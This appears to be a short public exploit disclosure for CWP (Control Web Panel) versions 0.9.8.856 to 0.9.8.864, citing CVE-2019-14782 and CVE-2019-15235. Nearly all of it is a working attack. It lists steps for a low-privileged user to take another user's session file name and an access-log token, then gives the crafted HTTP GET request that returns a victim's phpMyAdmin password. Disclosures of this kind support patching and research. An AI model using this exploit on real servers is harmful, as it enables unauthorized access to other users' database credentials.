Share
Exploit Title : CWP (Control Web Panel) phpMyAdmin password access  
Date : 20 Aug 2019  
Exploit Author : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak  
Vendor Homepage : https://control-webpanel.com/  
Software Link : Not available, user panel only available for lastest version  
Version : 0.9.8.856 - 0.9.8.864   
Tested on : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)  
CVE-Number : CVE-2019-14782, CVE-2019-15235  
Reference : N/A  
  
1. Login as an low privileged user  
2. Get Session file name from path "/tmp" or /home/[USERNAME]/tmp/session/sess_xxxxxx"  
3. Get token value from "/usr/local/cwpsrv/logs/access_log"  
4. Make a request to obtain target password  
  
GET /cwp_[token]/victim?module=pma HTTP/1.1  
Host: 192.168.1.1:2083  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Connection: close  
Referer: https://192.168.1.1:2083/  
Cookie: PHPSESSID=[sess_xxxxxx]